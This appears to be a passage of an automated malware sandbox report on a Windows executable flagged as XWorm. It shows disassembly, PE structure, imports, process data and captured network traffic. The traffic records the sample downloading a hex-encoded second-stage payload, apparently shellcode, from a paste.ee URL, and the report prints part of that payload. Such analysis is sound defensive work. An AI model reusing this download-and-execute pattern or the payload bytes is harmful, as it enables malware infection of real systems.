                                              add byte ptr [eax], al
                                              add byte ptr [ebx+46h], bl
                                              pop edx
                                              scasd
                                              and al, E4h
                                              and byte ptr [ebp-57h], al
                                              jmp 00007FBE0407991Ch
                                              adc ebp, dword ptr [ebx]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add dword ptr [eax], eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              dec ebx
                                              inc ebp
                                              js 00007FBD855B99CEh
                                              inc edi
                                              jne 00007FBD855B99B3h
                                              xor dword ptr [ecx+36h], esi
                                              dec ecx
                                              jc 00007FBD855B99B9h
                                              bound eax, dword ptr [ecx+58h]
                                              pop eax
                                              pop eax
                                              pop eax
                                              cmp byte ptr [eax], bh
                                              pop ecx
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              dec esp
                                              xor dword ptr [eax], eax
                                              or esi, dword ptr [esi]
                                              pop ds
                                              xchg eax, esp
                                              jmp far 4F97h : 452C8D24h
                                              fst qword ptr [edi+7Eh]
                                              mov al, byte ptr [47FFA77Ah]
                                              jo 00007FBD855B99EDh
                                              wait
                                              dec eax
                                              mov ecx, 3E4E91ECh
                                              push cs
                                              popfd
                                              dec ebx
                                              cmp cl, byte ptr [edi-53h]
                                              xor ebx, dword ptr [ecx-48EE309Ah]
                                              or al, 00h
                                              stosb
                                              add byte ptr [eax-2Dh], ah
                                              xchg eax, ebx
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              arpl bx, sp
                                              and dword ptr [eax], eax
                                              lodsb
                                              ror byte ptr [eax], cl
                                              add byte ptr [eax], al
                                              add al, 00h
                                              inc esp
                                              jc 00007FBD855B99E3h
                                              jnbe 00007FBD855B9982h
                                              or eax, 55000801h
                                              xor esi, dword ptr [eax+eax+00h]
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x269d340x28.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2730000x97a24.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x248.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x2696980x26a000053ff183a1caf0587f80f2ee96a4d709unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .data0x26b0000x71a40x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x2730000x97a240x980006efdb79fc11fbdfa04e52849529012d7False0.15507105777138158data3.0318703533667475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              EXE0x2734180xa000data1.0005126953125
                                              EXE0x27d4180x2dASCII text, with no line terminators1.1777777777777778
                                              RT_ICON0x27d4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.7128378378378378
                                              RT_ICON0x27d5700x368Device independent bitmap graphic, 16 x 32 x 24, image size 8320.8830275229357798
                                              RT_ICON0x27d8d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.8235815602836879
                                              RT_ICON0x27dd400x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.5161290322580645
                                              RT_ICON0x27e0280xca8Device independent bitmap graphic, 32 x 64 x 24, image size 32000.6805555555555556
                                              RT_ICON0x27ecd00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.599671669793621
                                              RT_ICON0x27fd780x668Device independent bitmap graphic, 48 x 96 x 4, image size 15360.375
                                              RT_ICON0x2803e00x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 72960.5612050163576882
                                              RT_ICON0x2820880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.49522821576763487
                                              RT_ICON0x2846300xa68Device independent bitmap graphic, 64 x 128 x 4, image size 25600.29429429429429427
                                              RT_ICON0x2850980x3228Device independent bitmap graphic, 64 x 128 x 24, image size 128000.49478193146417443
                                              RT_ICON0x2882c00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.42064241851676903
                                              RT_ICON0x28c4e80xa068Device independent bitmap graphic, 256 x 512 x 4, image size 409600.03253458016754335
                                              RT_ICON0x2965500x32028Device independent bitmap graphic, 256 x 512 x 24, image size 2048000.05124487404803749
                                              RT_ICON0x2c85780x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.04496700890611593
                                              RT_GROUP_ICON0x30a5a00xd8data0.5833333333333334
                                              RT_VERSION0x30a6780x3acdataEnglishUnited States0.5372340425531915
                                              DLLImport
                                              MSVBVM60.DLL__vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaAryMove, __vbaFreeVar, __vbaLineInputStr, __vbaLenBstr, __vbaStrVarMove, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaResume, __vbaStrCat, __vbaVarTextTstEq, __vbaLsetFixstr, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaStrFixstr, __vbaStrTextCmp, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVarZero, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaLbound, __vbaRedimPreserve, _adj_fpatan, __vbaAryRebase1Var, __vbaFixstrConstruct, __vbaRedim, __vbaDerefAry, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, __vbaVarAnd, EVENT_SINK_QueryInterface, __vbaVarTextCmpEq, __vbaUI1I4, __vbaExceptHandler, __vbaPrintFile, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, __vbaI2Var, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaInStr, __vbaVar2Vec, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, __vbaPowerR8, _adj_fdiv_r, __vbaVarAdd, __vbaAryLock, __vbaStrComp, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaVarCopy, __vbaFpI4, _CIatan, __vbaStrMove, __vbaStrVarCopy, _allmul, __vbaVarTextCmpNe, _CItan, __vbaUI1Var, __vbaAryUnlock, _CIexp, __vbaI4ErrVar, __vbaFreeObj, __vbaFreeStr
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 21, 2024 21:09:19.797451973 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:19.797485113 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:19.797564983 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:19.815707922 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:19.815748930 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:20.042082071 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:20.042187929 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:20.096009970 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:20.096033096 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:20.096839905 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:20.096910000 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:20.099467993 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:20.144160032 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:20.296122074 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:20.296164036 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:20.296188116 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:20.296219110 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:20.296240091 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:20.296262980 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:20.296268940 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:20.296282053 CEST44349705104.21.84.67192.168.2.5
                                              Apr 21, 2024 21:09:20.296307087 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:20.296328068 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:20.298724890 CEST49705443192.168.2.5104.21.84.67
                                              Apr 21, 2024 21:09:20.298738003 CEST44349705104.21.84.67192.168.2.5
                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 21, 2024 21:09:19.679045916 CEST5895553192.168.2.51.1.1.1
                                              Apr 21, 2024 21:09:19.783987999 CEST53589551.1.1.1192.168.2.5
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Apr 21, 2024 21:09:19.679045916 CEST192.168.2.51.1.1.10x3f8cStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Apr 21, 2024 21:09:19.783987999 CEST1.1.1.1192.168.2.50x3f8cNo error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                              Apr 21, 2024 21:09:19.783987999 CEST1.1.1.1192.168.2.50x3f8cNo error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                              • paste.ee
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549705104.21.84.674435712C:\Users\user\Desktop\GPgMeqI8Gy.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-21 19:09:20 UTC62OUTGET /r/tC4AK HTTP/1.1
                                              User-Agent: Himanen
                                              Host: paste.ee
                                              2024-04-21 19:09:20 UTC1286INHTTP/1.1 200 OK
                                              Date: Sun, 21 Apr 2024 19:09:20 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Cache-Control: max-age=2592000
                                              strict-transport-security: max-age=63072000
                                              x-frame-options: DENY
                                              x-content-type-options: nosniff
                                              x-xss-protection: 1; mode=block
                                              content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                              CF-Cache-Status: HIT
                                              Age: 5
                                              Last-Modified: Sun, 21 Apr 2024 19:09:15 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DfBD4a42dJyaNKGLZjeKjfvd%2BFL0v7n94sOIG815o62b9WGNcxPm5i6pC4rQ8wmm%2FOZ%2B2QaJgA2dNSv8MbgGub1qrPTKMDDmZ5Goa200SsZhitoEXoyV%2FYQ50g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 877faaf97919674d-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              2024-04-21 19:09:20 UTC83INData Raw: 61 31 30 0d 0a 36 30 45 38 34 45 30 30 30 30 30 30 36 42 30 30 36 35 30 30 37 32 30 30 36 45 30 30 36 35 30 30 36 43 30 30 33 33 30 30 33 32 30 30 30 30 30 30 36 45 30 30 37 34 30 30 36 34 30 30 36 43 30 30 36 43 30 30 30 30 30 30 30 30 30 30 30 30
                                              Data Ascii: a1060E84E0000006B00650072006E0065006C003300320000006E00740064006C006C000000000000
                                              2024-04-21 19:09:20 UTC1369INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 35 42 38 42 46 43 36 41 34 32 45 38 42 42 30 33 30 30 30 30 38 42 35 34 32 34 32 38 38 39 31 31 38 42 35 34 32 34 32 43 36 41 33 45 45 38 41 41 30 33 30 30 30 30 38 39 31 31 36 41 34 41 45 38 41 31 30 33 30 30 30 30 38 39 33 39 36 41 31 45 36 41 33 43 45 38 39 44 30 33 30 30 30 30 36 41 32 32 36 38 46 34 30 30 30 30 30 30 45 38 39 31 30 33 30 30 30 30 36 41 32 36 36 41 32 34 45 38 38 38 30 33 30 30 30 30 36 41 32 41 36 41 34 30 45 38 37 46 30 33 30 30 30 30 36 41 32 45 36 41 30 43 45 38 37
                                              Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F0300006A2E6A0CE87
                                              2024-04-21 19:09:20 UTC1131INData Raw: 30 30 30 38 42 43 31 36 41 32 45 45 38 33 42 30 31 30 30 30 30 38 42 30 39 35 30 46 46 37 37 31 30 35 36 35 32 46 46 33 31 36 41 30 30 45 38 32 41 30 31 30 30 30 30 36 38 41 31 36 41 33 44 44 38 35 31 45 38 35 36 30 31 30 30 30 30 38 33 43 34 30 43 46 46 44 30 36 41 33 36 45 38 31 33 30 31 30 30 30 30 38 42 31 31 38 33 43 32 30 31 38 39 31 31 36 41 33 41 45 38 30 35 30 31 30 30 30 30 38 42 30 39 33 42 43 41 30 46 38 35 33 33 46 46 46 46 46 46 36 41 33 32 45 38 46 34 30 30 30 30 30 30 38 42 30 39 43 37 30 31 30 37 30 30 30 31 30 30 36 41 30 30 45 38 45 35 30 30 30 30 30 30 36 38 44 32 43 37 41 37 36 38 35 31 45 38 31 31 30 31 30 30 30 30 36 41 33 32 45 38 44 33 30 30 30 30 30 30 38 42 31 31 36 41 32 45 45 38 43 41 30 30 30 30 30 30 38 42 30 39 35 32 46 46
                                              Data Ascii: 0008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F40000008B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF
                                              2024-04-21 19:09:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:21:09:11
                                              Start date:21/04/2024
                                              Path:C:\Users\user\Desktop\GPgMeqI8Gy.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\GPgMeqI8Gy.exe"
                                              Imagebase:0x400000
                                              File size:3'162'112 bytes
                                              MD5 hash:078BDED0D7282B8B8DAF4B40B837233A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:4
                                              Start time:21:09:19
                                              Start date:21/04/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 2040
                                              Imagebase:0x190000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:0.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:4
                                                Total number of Limit Nodes:0
                                                execution_graph 544 4016e8 #100 545 401248 546 4012a6 545->546 547 40130e __vbaExceptHandler 545->547 546->547

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4016e8-40170d #100
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2269652854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2269633871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269652854.0000000000412000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269652854.0000000000419000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269652854.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269652854.000000000044B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269652854.000000000045E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269652854.000000000048D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269652854.000000000061F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269861206.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269861206.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269904300.0000000000673000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269904300.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269904300.0000000000695000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269904300.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269904300.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269904300.00000000006D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2269904300.0000000000709000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_GPgMeqI8Gy.jbxd
                                                Similarity
                                                • API ID: #100
                                                • String ID:
                                                • API String ID: 1341478452-0
                                                • Opcode ID: 106363715bcb511c6d88c2ca67f11aab0bc643a449b70a3b1bffe191bd977fc2
                                                • Instruction ID: b708d4004a58abdc1b8a6f707902cc465867c3a8aa61aa7f58d1bd6fbfecec5d
                                                • Opcode Fuzzy Hash: 106363715bcb511c6d88c2ca67f11aab0bc643a449b70a3b1bffe191bd977fc2
                                                • Instruction Fuzzy Hash: 36E02B0698F3C14ED30387B059620882F304C032A431E08E7C880CE0E7888A488AC332
                                                Uniqueness

                                                Uniqueness Score: -1.00%